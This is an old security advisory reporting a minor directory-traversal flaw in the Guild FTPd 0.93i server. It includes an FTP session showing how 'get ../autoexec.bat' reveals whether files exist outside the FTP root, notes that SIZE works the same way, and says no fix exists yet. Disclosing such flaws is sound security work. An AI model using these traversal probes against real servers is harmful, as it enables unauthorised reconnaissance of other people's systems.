COMMAND

    Guild FTPd

SYSTEMS AFFECTED

    Guild FTPd

PROBLEM

    Andrew Lewis found following.  He found a more minor vulnerability
    in Guild FTPd - although  directory transversal with GET can't  be
    used to d/l  files outside of  the FTP root  directory, it can  be
    used to see if files exist.  An example follows...

        C:\wizdumb>ftp localhost
        Connected to kung-phusion.
        220-GuildFTPD FTP Server (c) 1999
        220-Version 0.93i
        220 Please enter your name:
        User (kung-phusion:(none)): test
        331 User name okay, Need password.
        Password:
        230 User logged in.
        ftp> cd ..
        550 Access denied.
        ftp> get ../nonexistant.txt
        200 PORT command successful.
        550 Access denied.
        ftp> get ../autoexec.bat
        200 PORT command successful.
        150 Opening ascii mode data connection for \../autoexec.bat (1143 bytes).
        425 Download failed.
        ftp> quit
        221 Goodbye.  Control connection closed.

    The SIZE command can also be used in a similar manner.

SOLUTION

    Nothing yet.